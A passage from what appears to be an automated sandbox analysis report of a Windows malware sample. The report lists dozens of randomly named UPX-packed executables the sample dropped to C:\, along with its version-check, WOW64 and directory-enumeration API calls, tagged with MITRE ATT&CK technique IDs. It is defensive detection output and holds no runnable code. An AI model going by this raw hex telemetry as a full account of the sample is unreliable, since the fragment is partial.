\"tddht.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"hfnrrt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"drtpjh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"482486.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0484408.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2226066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"2822060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\2822060.exe]- [targetUID: 00000000-00002724]\n \"46000.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46000.exe]- [targetUID: 00000000-00002724]\n \"644802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\644802.exe]- [targetUID: 00000000-00003584]\n \"288022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\288022.exe]- [targetUID: 00000000-00003380]\n \"446022.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\446022.exe]- [targetUID: 00000000-00001724]\n \"fdrnfdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fdrnfdr.exe]- [targetUID: 00000000-00001700]\n \"jbvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jbvpj.exe]- [targetUID: 00000000-00001700]\n \"ldpnpvp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldpnpvp.exe]- [targetUID: 00000000-00003948]\n \"jptlrlr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jptlrlr.exe]- [targetUID: 00000000-00000768]\n \"nvpvtb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvpvtb.exe]- [targetUID: 00000000-00000768]\n \"jjtrtt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jjtrtt.exe]- [targetUID: 00000000-00003308]\n \"jdrfr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jdrfr.exe]- [targetUID: 00000000-00002448]\n \"682606.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\682606.exe]- [targetUID: 00000000-00002448]\n \"00288.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\00288.exe]- [targetUID: 00000000-00000388]\n \"46248.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\46248.exe]- [targetUID: 00000000-00001220]\n \"60860.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\60860.exe]- [targetUID: 00000000-00000568]\n \"628644.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\628644.exe]- [targetUID: 00000000-00000568]\n \"620262.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620262.exe]- [targetUID: 00000000-00001744]\n \"444002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\444002.exe]- [targetUID: 00000000-00001744]\n \"642428.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\642428.exe]- [targetUID: 00000000-00000328]\n \"64600.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64600.exe]- [targetUID: 00000000-00003760]\n \"64826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64826.exe]- [targetUID: 00000000-00003896]\n \"xjntxb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjntxb.exe]- [targetUID: 00000000-00002472]\n \"frljb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\frljb.exe]- [targetUID: 00000000-00004616]\n \"dhrldf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhrldf.exe]- [targetUID: 00000000-00004616]\n \"hpfbrjf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\hpfbrjf.exe]- [targetUID: 00000000-00004588]\n \"vjnxj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vjnxj.exe]- [targetUID: 00000000-00004580]\n \"ffdpvvb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffdpvvb.exe]- [targetUID: 00000000-00004580]\n \"bbxnv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bbxnv.exe]- [targetUID: 00000000-00002284]\n \"dthbf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dthbf.exe]- [targetUID: 00000000-00001284]\n \"blphnxr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\blphnxr.exe]- [targetUID: 00000000-00001284]\n \"jxhdr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxhdr.exe]- [targetUID: 00000000-00003580]\n \"rptdfh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rptdfh.exe]- [targetUID: 00000000-00003580]\n \"pvjjxn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pvjjxn.exe]- [targetUID: 00000000-00003616]\n \"rhlpfp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rhlpfp.exe]- [targetUID: 00000000-00003616]\n \"nblhvh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nblhvh.exe]- [targetUID: 00000000-00004060]\n \"xffxhjl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xffxhjl.exe]- [targetUID: 00000000-00001844]\n \"vpdhr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vpdhr.exe]- [targetUID: 00000000-00001844]\n \"68448.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\68448.exe]- [targetUID: 00000000-00003348]\n \"4240462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4240462.exe]- [targetUID: 00000000-00003348]\n \"4688686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4688686.exe]- [targetUID: 00000000-00000944]\n \"6884282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6884282.exe]- [targetUID: 00000000-00001900]\n \"6062268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6062268.exe]- [targetUID: 00000000-00004520]\n \"8608268.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8608268.exe]- [targetUID: 00000000-00003352]\n \"20046.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\20046.exe]- [targetUID: 00000000-00003352]\n \"28800.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28800.exe]- [targetUID: 00000000-00004508]\n \"64226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\64226.exe]- [targetUID: 00000000-00004508]\n \"jftjpxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jftjpxt.exe]- [targetUID: 00000000-00003364]\n \"pbbvvxt.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pbbvvxt.exe]- [targetUID: 00000000-00002700]\n \"pdbtf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\pdbtf.exe]- [targetUID: 00000000-00002700]\n \"dtxrlp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dtxrlp.exe]- [targetUID: 00000000-00006032]\n \"bdppl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bdppl.exe]- [targetUID: 00000000-00006032]\n \"8420244.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8420244.exe]- [targetUID: 00000000-00004256]\n \"460060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\460060.exe]- [targetUID: 00000000-00004476]\n \"lvvdvpj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvvdvpj.exe]- [targetUID: 00000000-00004476]\n \"ndfntv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ndfntv.exe]- [targetUID: 00000000-00004168]\n \"8028040.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8028040.exe]- [targetUID: 00000000-00004064]\n \"lnxndll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnxndll.exe]- [targetUID: 00000000-00000864]\n \"xlrdpdb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xlrdpdb.exe]- [targetUID: 00000000-00000864]\n \"44628.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\44628.exe]- [targetUID: 00000000-00004428]\n \"0260006.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0260006.exe]- [targetUID: 00000000-00005924]\n \"28482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\28482.exe]- [targetUID: 00000000-00005924]\n \"06626.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\06626.exe]- [targetUID: 00000000-00005952]\n \"vftrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vftrx.exe]- [targetUID: 00000000-00006096]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000200090f720008bf72000000000000000000000001900000000011ce312000000000080f0120095e129771e0a1700feffffff435c2d7750592d77aa000000b80000008af7200088f72000a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d77b2f72000a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c0375b2f72000a06a0375a06a037514e9120002020000 (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006096)\n \"vftrx.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002d00782f2d00732f2d00000000000000000000002500000000011ce312000000000080f0120095e12977d6081700feffffff435c2d7750592d77aa000000b8000000722f2d00702f2d00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d779a2f2d00a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c03759a2f2d00a06a0375a06a037514e9120002020000 (UID: 00000000-00006136)\n \"vftrx.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006136)\n \"06626.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000027009864270093642700000000000000000000001f00000000011ce312000000000080f0120095e1297730081700feffffff435c2d7750592d77aa000000b80000009264270090642700a4e41200dce81200000000000000000000000000000000000000000000000000e019000000001f001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d77ba642700a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c0375ba642700a06a0375a06a037514e9120002020000 (UID: 00000000-00005952)\n \"06626.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)\n \"28482.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00b02f1f00ab2f1f00000000000000000000001700000000011ce312000000000080f0120095e129773a0f1700feffffff435c2d7750592d77aa000000b8000000aa2f1f00a82f1f00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d77d22f1f00a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c0375d22f1f00a06a0375a06a037514e9120002020000 (UID: 00000000-00005924)\n \"28482.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005924)\n \"0260006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004428)\n \"0260006.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000003600282f3600232f3600000000000000000000002e00000000011ce312000000000080f0120095e12977240e1700feffffff435c2d7750592d77aa000000b8000000222f3600202f3600a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002e001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d774a2f3600a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c03754a2f3600a06a0375a06a037514e9120002020000 (UID: 00000000-00004428)\n \"0260006.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004428)\n \"44628.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002b0050302b004b302b00000000000000000000002300000000011ce312000000000080f0120095e12977c6331700feffffff435c2d7750592d77aa000000b80000004a302b0048302b00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d7772302b00a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c037572302b00a06a0375a06a037514e9120002020000 (UID: 00000000-00005656)\n \"44628.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005656)\n \"xlrdpdb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000864)\n \"xlrdpdb.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000310048b3310043b33100000000000000000000002a00000000011ce312000000000080f0120095e1297730331700feffffff435c2d7750592d77aa000000b800000042b3310040b33100a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002a001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d776ab33100a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c03756ab33100a06a0375a06a037514e9120002020000 (UID: 00000000-00000864)\n \"xlrdpdb.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00000864)\n \"lnxndll.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004064)\n \"lnxndll.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002c0030b32c002bb32c00000000000000000000002500000000011ce312000000000080f0120095e12977d2301700feffffff435c2d7750592d77aa000000b80000002ab32c0028b32c00a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d7752b32c00a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c037552b32c00a06a0375a06a037514e9120002020000 (UID: 00000000-00004064)\n \"lnxndll.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004064)\n \"8028040.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004168)\n \"8028040.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001d00b8301d00b3301d00000000000000000000001500000000011ce312000000000080f0120095e1297764341700feffffff435c2d7750592d77aa000000b8000000b2301d00b0301d00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000015001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d77da301d00a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c0375da301d00a06a0375a06a037514e9120002020000 (UID: 00000000-00004168)\n \"8028040.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004168)\n \"ndfntv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)\n \"ndfntv.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000033000831330003313300000000000000000000002b00000000011ce312000000000080f0120095e12977343a1700feffffff435c2d7750592d77aa000000b80000000231330000313300a4e41200dce81200000000000000000000000000000000000000000000000000e019000000002b001c5c2c7760d81c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096ed2d772a313300a06a037586000000a4e41200dce812000000000086008800a06a0375a4e41200916c03752a313300a06a0375a06a037514e9120002020000 (UID: 00000000-00006080)\n \"ndfntv.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006080)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0260006.exe\" called \"IsWow64Process\" with parameter \"4428\" - (UID: 00000000-00004428)\n \"xlrdpdb.exe\" called \"IsWow64Process\" with parameter \"864\" - (UID: 00000000-00000864)\n \"lnxndll.exe\" called \"IsWow64Process\" with parameter \"4064\" - (UID: 00000000-00004064)\n \"8028040.exe\" called \"IsWow64Process\" with parameter \"4168\" - (UID: 00000000-00004168)\n \"ndfntv.exe\" called \"IsWow64Process\" with parameter \"6080\" - (UID: 00000000-00006080)\n \"8420244.exe\" called \"IsWow64Process\" with parameter \"3872\" - (UID: 00000000-00003872)\n \"bdppl.exe\" called \"IsWow64Process\" with parameter \"6032\" - (UID: 00000000-00006032)\n \"dtxrlp.exe\" called \"IsWow64Process\" with parameter \"4516\" - (UID: 00000000-00004516)\n \"pdbtf.exe\" called \"IsWow64Process\" with parameter \"2700\" - (UID: 00000000-00002700)\n \"pbbvvxt.exe\" called \"IsWow64Process\" with parameter \"4104\" - (UID: 00000000-00004104)\n \"64226.exe\" called \"IsWow64Process\" with parameter \"4508\" - (UID: 00000000-00004508)\n \"8608268.exe\" called \"IsWow64Process\" with parameter \"3752\" - (UID: 00000000-00003752)\n \"6062268.exe\" called \"IsWow64Process\" with parameter \"4520\" - (UID: 00000000-00004520)\n \"4240462.exe\" called \"IsWow64Process\" with parameter \"3348\" - (UID: 00000000-00003348)\n \"xffxhjl.exe\" called \"IsWow64Process\" with parameter \"3004\" - (UID: 00000000-00003004)\n \"rptdfh.exe\" called \"IsWow64Process\" with parameter \"3580\" - (UID: 00000000-00003580)\n \"blphnxr.exe\" called \"IsWow64Process\" with parameter \"1284\" - (UID: 00000000-00001284)\n \"frljb.exe\" called \"IsWow64Process\" with parameter \"2472\" - (UID: 00000000-00002472)\n \"64826.exe\" called \"IsWow64Process\" with parameter \"132\" - (UID: 00000000-00000132)\n \"64600.exe\" called \"IsWow64Process\" with parameter \"3760\" - (UID: 00000000-00003760)\n \"642428.exe\" called \"IsWow64Process\" with parameter \"328\" - (UID: 00000000-00000328)\n \"444002.exe\" called \"IsWow64Process\" with parameter \"1744\" - (UID: 00000000-00001744)\n \"620262.exe\" called \"IsWow64Process\" with parameter \"4204\" - (UID: 00000000-00004204)\n \"628644.exe\" called \"IsWow64Process\" with parameter \"568\" - (UID: 00000000-00000568)\n \"00288.exe\" called \"IsWow64Process\" with parameter \"388\" - (UID: 00000000-00000388)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindFirstFileW\" with parameter c:\\*.* (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter $Recycle.Bin (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter 511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe (UID: 00000000-00006096)\n \"511bca581824f939cba8f72afb50c5d8838269f61c8d4e147cc37b8f55927f0e.exe\" called \"FindNextFileW\" with parameter autoexec.bat (UID: 00000000-00006096)\n 